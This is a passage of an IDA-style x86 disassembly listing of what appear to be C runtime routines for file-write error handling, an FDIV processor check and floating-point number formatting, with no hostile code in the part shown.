mov edx, [ebp+var_8]
lea eax, [ebp+var_414]
sub edx, eax
cmp [ebp+var_418], edx
jge short loc_422578
jmp short loc_42258A
; ---------------------------------------------------------------------------
loc_422578: ; CODE XREF: sub_422400+174�j
jmp short loc_422585
; ---------------------------------------------------------------------------
loc_42257A: ; CODE XREF: sub_422400+155�j
call ds:dword_4942F0
mov [ebp+var_C], eax
jmp short loc_42258A
; ---------------------------------------------------------------------------
loc_422585: ; CODE XREF: sub_422400:loc_422578�j
jmp loc_42248D
; ---------------------------------------------------------------------------
loc_42258A: ; CODE XREF: sub_422400+96�j
; sub_422400+176�j ...
jmp short loc_4225DC
; ---------------------------------------------------------------------------
loc_42258C: ; CODE XREF: sub_422400+7A�j
push 0
lea ecx, [ebp+var_418]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
mov ecx, [eax+edx]
push ecx
call ds:dword_4942E4
test eax, eax
jz short loc_4225D3
mov [ebp+var_C], 0
mov edx, [ebp+var_418]
mov [ebp+var_10], edx
jmp short loc_4225DC
; ---------------------------------------------------------------------------
loc_4225D3: ; CODE XREF: sub_422400+1BF�j
call ds:dword_4942F0
mov [ebp+var_C], eax
loc_4225DC: ; CODE XREF: sub_422400:loc_42258A�j
; sub_422400+1D1�j
cmp [ebp+var_10], 0
jnz loc_422666
cmp [ebp+var_C], 0
jz short loc_42261A
cmp [ebp+var_C], 5
jnz short loc_422609
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov ecx, [ebp+var_C]
mov [eax], ecx
jmp short loc_422615
; ---------------------------------------------------------------------------
loc_422609: ; CODE XREF: sub_422400+1F0�j
mov edx, [ebp+var_C]
push edx
call sub_422E80
add esp, 4
loc_422615: ; CODE XREF: sub_422400+207�j
or eax, 0FFFFFFFFh
jmp short loc_42266F
; ---------------------------------------------------------------------------
loc_42261A: ; CODE XREF: sub_422400+1EA�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 40h
test eax, eax
jz short loc_42264B
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
cmp edx, 1Ah
jnz short loc_42264B
xor eax, eax
jmp short loc_42266F
; ---------------------------------------------------------------------------
loc_42264B: ; CODE XREF: sub_422400+23A�j
; sub_422400+245�j
call sub_422F20
mov dword ptr [eax], 1Ch
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_42266F
; ---------------------------------------------------------------------------
loc_422666: ; CODE XREF: sub_422400+1E0�j
mov eax, [ebp+var_10]
sub eax, [ebp+var_420]
loc_42266F: ; CODE XREF: sub_422400+21�j
; sub_422400+218�j ...
mov esp, ebp
pop ebp
retn
sub_422400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422680 proc near ; CODE XREF: sub_41A330+15�p
; .text:004288C5�p
push ebp
mov ebp, esp
push 30000h
push 10000h
call sub_428890
add esp, 8
pop ebp
retn
sub_422680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226A0 proc near ; CODE XREF: sub_422700:loc_422739�p
var_1C = dword ptr -1Ch
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov dword ptr [ebp+var_18], 80000000h
mov dword ptr [ebp+var_18+4], 4147FFFFh
mov dword ptr [ebp+var_8], 0C0000000h
mov dword ptr [ebp+var_8+4], 4150017Eh
fld [ebp+var_8]
fdiv [ebp+var_18]
fmul [ebp+var_18]
fsubr [ebp+var_8]
fstp [ebp+var_10]
fld [ebp+var_10]
fcomp ds:dbl_432FD8
fnstsw ax
test ah, 41h
jnz short loc_4226ED
mov [ebp+var_1C], 1
jmp short loc_4226F4
; ---------------------------------------------------------------------------
loc_4226ED: ; CODE XREF: sub_4226A0+42�j
mov [ebp+var_1C], 0
loc_4226F4: ; CODE XREF: sub_4226A0+4B�j
mov eax, [ebp+var_1C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4226A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422700 proc near ; CODE XREF: sub_41A330+B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push offset aKernel32 ; "KERNEL32"
call ds:dword_494380
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_422739
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
mov eax, [ebp+var_4]
push eax
call ds:dword_494348
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_422739
push 0
call [ebp+var_8]
jmp short loc_42273E
; ---------------------------------------------------------------------------
loc_422739: ; CODE XREF: sub_422700+18�j
; sub_422700+30�j
call sub_4226A0
loc_42273E: ; CODE XREF: sub_422700+37�j
mov esp, ebp
pop ebp
retn
sub_422700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422750 proc near ; CODE XREF: sub_41EA90+6CF�p
; DATA XREF: sub_41A370+21�o ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call sub_41AE40
add esp, 4
cmp eax, 65h
jz short loc_4227B0
loc_42276A: ; CODE XREF: sub_422750+5E�j
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
cmp dword_442F58, 1
jle short loc_422792
push 4
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_C], eax
jmp short loc_4227AA
; ---------------------------------------------------------------------------
loc_422792: ; CODE XREF: sub_422750+2A�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_C], edx
loc_4227AA: ; CODE XREF: sub_422750+40�j
cmp [ebp+var_C], 0
jnz short loc_42276A
loc_4227B0: ; CODE XREF: sub_422750+18�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_8], cl
mov edx, [ebp+arg_0]
mov al, byte_442F5C
mov [edx], al
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_4227CB: ; CODE XREF: sub_422750+A2�j
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ebp+var_4], al
mov ecx, [ebp+arg_0]
mov dl, [ebp+var_8]
mov [ecx], dl
mov al, [ebp+var_4]
mov [ebp+var_8], al
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
test edx, edx
jnz short loc_4227CB
mov esp, ebp
pop ebp
retn
sub_422750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422800 proc near ; CODE XREF: sub_41EA90+6F1�p
; DATA XREF: sub_41A370+D�o ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
loc_422804: ; CODE XREF: sub_422800+28�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42282A
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
movsx ecx, byte_442F5C
cmp eax, ecx
jz short loc_42282A
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_422804
; ---------------------------------------------------------------------------
loc_42282A: ; CODE XREF: sub_422800+C�j
; sub_422800+1D�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
test ecx, ecx
jz loc_4228D3
loc_422841: ; CODE XREF: sub_422800+6A�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42286C
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
cmp eax, 65h
jz short loc_42286C
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 45h
jz short loc_42286C
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_422841
; ---------------------------------------------------------------------------
loc_42286C: ; CODE XREF: sub_422800+49�j
; sub_422800+54�j ...
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
sub edx, 1
mov [ebp+arg_0], edx
loc_42287B: ; CODE XREF: sub_422800+8F�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jnz short loc_422891
mov edx, [ebp+arg_0]
sub edx, 1
mov [ebp+arg_0], edx
jmp short loc_42287B
; ---------------------------------------------------------------------------
loc_422891: ; CODE XREF: sub_422800+84�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
movsx edx, byte_442F5C
cmp ecx, edx
jnz short loc_4228AB
mov eax, [ebp+arg_0]
sub eax, 1
mov [ebp+arg_0], eax
loc_4228AB: ; CODE XREF: sub_422800+A0�j
; sub_422800+D1�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
test eax, eax
jz short loc_4228D3
jmp short loc_4228AB
; ---------------------------------------------------------------------------
loc_4228D3: ; CODE XREF: sub_422800+3B�j
; sub_422800+CF�j
mov esp, ebp
pop ebp
retn
sub_422800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228E0 proc near ; DATA XREF: sub_41A370+2B�o
; .data:off_443210�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_433008
fnstsw ax
test ah, 1
jnz short loc_4228FF
mov [ebp+var_4], 1
jmp short loc_422906
; ---------------------------------------------------------------------------
loc_4228FF: ; CODE XREF: sub_4228E0+14�j
mov [ebp+var_4], 0
loc_422906: ; CODE XREF: sub_4228E0+1D�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4228E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422910 proc near ; CODE XREF: sub_41FBE0+1138�p
; DATA XREF: sub_41A370+17�o ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_42293C
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_8]
push ecx
call sub_4293C0
add esp, 8
mov edx, [ebp+arg_4]
mov eax, [ebp+var_8]
mov [edx], eax
mov ecx, [ebp+var_4]
mov [edx+4], ecx
jmp short loc_422954
; ---------------------------------------------------------------------------
loc_42293C: ; CODE XREF: sub_422910+A�j
mov edx, [ebp+arg_8]
push edx
lea eax, [ebp+var_C]
push eax
call sub_429440
add esp, 8
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_C]
mov [ecx], edx
loc_422954: ; CODE XREF: sub_422910+2A�j
mov esp, ebp
pop ebp
retn
sub_422910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422960 proc near ; CODE XREF: sub_422DF0+1F�p
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
lea eax, [ebp+var_14]
mov [ebp+var_4], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_429580
add esp, 10h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_8]
add ecx, 1
push ecx
mov edx, [ebp+var_4]
xor eax, eax
cmp dword ptr [edx], 2Dh
setz al
mov ecx, [ebp+arg_4]
add ecx, eax
xor edx, edx
cmp [ebp+arg_8], 0
setnle dl
add ecx, edx
push ecx
call sub_429480
add esp, 0Ch
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_4229E0
add esp, 14h
mov eax, [ebp+arg_4]
mov esp, ebp
pop ebp
retn
sub_422960 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229E0 proc near ; CODE XREF: sub_422960+67�p
; sub_422D00+9D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 8
movsx eax, [ebp+arg_10]
test eax, eax
jz short loc_422A17
mov ecx, [ebp+arg_C]
xor edx, edx
cmp dword ptr [ecx], 2Dh
setz dl
mov eax, [ebp+arg_0]
add eax, edx
mov [ebp+var_4], eax
xor ecx, ecx
cmp [ebp+arg_4], 0
setnle cl
push ecx
mov edx, [ebp+var_4]
push edx
call sub_422E50
add esp, 8
loc_422A17: ; CODE XREF: sub_4229E0+C�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 2Dh
jnz short loc_422A34
mov edx, [ebp+var_4]
mov byte ptr [edx], 2Dh
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_422A34: ; CODE XREF: sub_4229E0+43�j
cmp [ebp+arg_4], 0
jle short loc_422A58
mov ecx, [ebp+var_4]
mov edx, [ebp+var_4]
mov al, [edx+1]
mov [ecx], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov al, byte_442F5C
mov [edx], al
loc_422A58: ; CODE XREF: sub_4229E0+58�j
push offset aE000 ; "e+000"
mov ecx, [ebp+var_4]
add ecx, [ebp+arg_4]
movsx edx, [ebp+arg_10]
neg edx
sbb edx, edx
inc edx
add ecx, edx
push ecx
call sub_419FA0
add esp, 8
mov [ebp+var_4], eax
cmp [ebp+arg_8], 0
jz short loc_422A86
mov eax, [ebp+var_4]
mov byte ptr [eax], 45h
loc_422A86: ; CODE XREF: sub_4229E0+9E�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_C]
mov eax, [edx+0Ch]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jz loc_422B3F
mov edx, [ebp+arg_C]
mov eax, [edx+4]
sub eax, 1
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jge short loc_422AC1
mov ecx, [ebp+var_8]
neg ecx
mov [ebp+var_8], ecx
mov edx, [ebp+var_4]
mov byte ptr [edx], 2Dh
loc_422AC1: ; CODE XREF: sub_4229E0+D1�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
cmp [ebp+var_8], 64h
jl short loc_422AF5
mov eax, [ebp+var_8]
cdq
mov ecx, 64h
idiv ecx
mov edx, [ebp+var_4]
mov cl, [edx]
add cl, al
mov edx, [ebp+var_4]
mov [edx], cl
mov eax, [ebp+var_8]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_8], edx
loc_422AF5: ; CODE XREF: sub_4229E0+EE�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
cmp [ebp+var_8], 0Ah
jl short loc_422B29
mov eax, [ebp+var_8]
cdq
mov ecx, 0Ah
idiv ecx
mov edx, [ebp+var_4]
mov cl, [edx]
add cl, al
mov edx, [ebp+var_4]
mov [edx], cl
mov eax, [ebp+var_8]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+var_8], edx
loc_422B29: ; CODE XREF: sub_4229E0+122�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
add cl, byte ptr [ebp+var_8]
mov edx, [ebp+var_4]
mov [edx], cl
loc_422B3F: ; CODE XREF: sub_4229E0+BB�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_4229E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422B50 proc near ; CODE XREF: sub_422DF0+3B�p
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
lea eax, [ebp+var_14]
mov [ebp+var_4], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_429580
add esp, 10h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
add edx, [ecx+4]
push edx
mov eax, [ebp+var_4]
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
mov edx, [ebp+arg_4]
add edx, ecx
push edx
call sub_429480
add esp, 0Ch
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_422BC0
add esp, 10h
mov eax, [ebp+arg_4]
mov esp, ebp
pop ebp
retn
sub_422B50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422BC0 proc near ; CODE XREF: sub_422B50+5B�p
; sub_422D00+D9�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
sub ecx, 1
mov [ebp+var_8], ecx
movsx edx, [ebp+arg_C]
test edx, edx
jz short loc_422C13
mov eax, [ebp+arg_8]
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
mov edx, [ebp+arg_0]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnz short loc_422C13
mov ecx, [ebp+var_4]
add ecx, [ebp+var_8]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
mov byte ptr [edx], 30h
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
mov byte ptr [ecx], 0
loc_422C13: ; CODE XREF: sub_422BC0+18�j
; sub_422BC0+33�j
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 2Dh
jnz short loc_422C30
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_422C30: ; CODE XREF: sub_422BC0+5F�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+4], 0
jg short loc_422C58
push 1
mov ecx, [ebp+var_4]
push ecx
call sub_422E50
add esp, 8
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_422C64
; ---------------------------------------------------------------------------
loc_422C58: ; CODE XREF: sub_422BC0+77�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
add edx, [ecx+4]
mov [ebp+var_4], edx
loc_422C64: ; CODE XREF: sub_422BC0+96�j
cmp [ebp+arg_4], 0
jle loc_422CF6
push 1
mov eax, [ebp+var_4]
push eax
call sub_422E50
add esp, 8
mov ecx, [ebp+var_4]
mov dl, byte_442F5C
mov [ecx], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+4], 0
jge short loc_422CF6
movsx edx, [ebp+arg_C]
test edx, edx
jz short loc_422CAE
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
neg ecx
mov [ebp+arg_4], ecx
jmp short loc_422CD4
; ---------------------------------------------------------------------------
loc_422CAE: ; CODE XREF: sub_422BC0+DF�j
mov edx, [ebp+arg_8]
mov eax, [edx+4]
neg eax
cmp [ebp+arg_4], eax
jge short loc_422CC3
mov ecx, [ebp+arg_4]
mov [ebp+var_10], ecx
jmp short loc_422CCE
; ---------------------------------------------------------------------------
loc_422CC3: ; CODE XREF: sub_422BC0+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx+4]
neg eax
mov [ebp+var_10], eax
loc_422CCE: ; CODE XREF: sub_422BC0+101�j
mov ecx, [ebp+var_10]
mov [ebp+arg_4], ecx
loc_422CD4: ; CODE XREF: sub_422BC0+EC�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_4]
push eax
call sub_422E50
add esp, 8
mov ecx, [ebp+arg_4]
push ecx
push 30h
mov edx, [ebp+var_4]
push edx
call sub_4189A0
add esp, 0Ch
loc_422CF6: ; CODE XREF: sub_422BC0+A8�j
; sub_422BC0+D7�j
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn
sub_422BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D00 proc near ; CODE XREF: sub_422DF0+55�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov [ebp+var_30], 0
lea eax, [ebp+var_14]
mov [ebp+var_38], eax
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
mov edx, [eax]
push edx
call sub_429580
add esp, 10h
mov eax, [ebp+var_38]
mov ecx, [eax+4]
sub ecx, 1
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
xor eax, eax
cmp dword ptr [edx], 2Dh
setz al
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_429480
add esp, 0Ch
mov edx, [ebp+var_38]
mov eax, [edx+4]
sub eax, 1
xor ecx, ecx
cmp [ebp+var_34], eax
setl cl
mov [ebp+var_30], cl
mov edx, [ebp+var_38]
mov eax, [edx+4]
sub eax, 1
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFCh
jl short loc_422D8B
mov ecx, [ebp+var_34]
cmp ecx, [ebp+arg_8]
jl short loc_422DA7
loc_422D8B: ; CODE XREF: sub_422D00+81�j
push 1
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_4229E0
add esp, 14h
jmp short loc_422DE1
; ---------------------------------------------------------------------------
loc_422DA7: ; CODE XREF: sub_422D00+89�j
movsx eax, [ebp+var_30]
test eax, eax
jz short loc_422DCB
loc_422DAF: ; CODE XREF: sub_422D00+C2�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
test edx, edx
jz short loc_422DC4
jmp short loc_422DAF
; ---------------------------------------------------------------------------
loc_422DC4: ; CODE XREF: sub_422D00+C0�j
mov ecx, [ebp+var_4]
mov byte ptr [ecx-2], 0
loc_422DCB: ; CODE XREF: sub_422D00+AD�j
push 1
mov edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_422BC0
add esp, 10h
loc_422DE1: ; CODE XREF: sub_422D00+A5�j
mov esp, ebp
pop ebp
retn
sub_422D00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422DF0 proc near ; CODE XREF: sub_41EA90+6AD�p
; DATA XREF: sub_41A370+3�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_422DFF
cmp [ebp+arg_8], 45h
jnz short loc_422E19
loc_422DFF: ; CODE XREF: sub_422DF0+7�j
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_422960
add esp, 10h
jmp short loc_422E4D
; ---------------------------------------------------------------------------
loc_422E19: ; CODE XREF: sub_422DF0+D�j
cmp [ebp+arg_8], 66h
jnz short loc_422E35
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_422B50
add esp, 0Ch
jmp short loc_422E4D
; ---------------------------------------------------------------------------
loc_422E35: ; CODE XREF: sub_422DF0+2D�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_422D00
add esp, 10h
loc_422E4D: ; CODE XREF: sub_422DF0+27�j
; sub_422DF0+43�j
pop ebp
retn
sub_422DF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E50 proc near ; CODE XREF: sub_4229E0+2F�p
; sub_422BC0+7F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jz short loc_422E7C
mov eax, [ebp+arg_0]
push eax
call sub_418E70
add esp, 4
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
add edx, [ebp+arg_4]
push edx
call sub_426C00
add esp, 0Ch
loc_422E7C: ; CODE XREF: sub_422E50+7�j
pop ebp
retn
sub_422E50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E80 proc near ; CODE XREF: sub_41A3E0+1E�p
; sub_41B720+2E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_422F30
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov [ebp+var_4], 0
jmp short loc_422EA0
; ---------------------------------------------------------------------------
loc_422E97: ; CODE XREF: sub_422E80:loc_422EC8�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_422EA0: ; CODE XREF: sub_422E80+15�j
cmp [ebp+var_4], 2Dh
jnb short loc_422ECA
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
cmp ecx, dword_443218[eax*8]
jnz short loc_422EC8
call sub_422F20
mov edx, [ebp+var_4]
mov ecx, dword_44321C[edx*8]
mov [eax], ecx
jmp short loc_422F0D
; ---------------------------------------------------------------------------
loc_422EC8: ; CODE XREF: sub_422E80+33�j
jmp short loc_422E97
; ---------------------------------------------------------------------------
loc_422ECA: ; CODE XREF: sub_422E80+24�j
cmp [ebp+arg_0], 13h
jb short loc_422EE3
cmp [ebp+arg_0], 24h
ja short loc_422EE3
call sub_422F20
mov dword ptr [eax], 0Dh
jmp short loc_422F0D
; ---------------------------------------------------------------------------
loc_422EE3: ; CODE XREF: sub_422E80+4E�j
; sub_422E80+54�j
cmp [ebp+arg_0], 0BCh
jb short loc_422F02
cmp [ebp+arg_0], 0CAh
ja short loc_422F02
call sub_422F20
mov dword ptr [eax], 8
jmp short loc_422F0D
; ---------------------------------------------------------------------------
loc_422F02: ; CODE XREF: sub_422E80+6A�j
; sub_422E80+73�j
call sub_422F20
mov dword ptr [eax], 16h
loc_422F0D: ; CODE XREF: sub_422E80+46�j
; sub_422E80+61�j ...
mov esp, ebp
pop ebp
retn
sub_422E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F20 proc near ; CODE XREF: sub_41A3E0+3F�p
; sub_41A870:loc_41AB42�p ...
push ebp
mov ebp, esp
call sub_41FA10
add eax, 8
pop ebp
retn
sub_422F20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F30 proc near ; CODE XREF: sub_41A3E0+4A�p
; sub_41C930+4E�p ...
push ebp
mov ebp, esp
call sub_41FA10
add eax, 0Ch
pop ebp
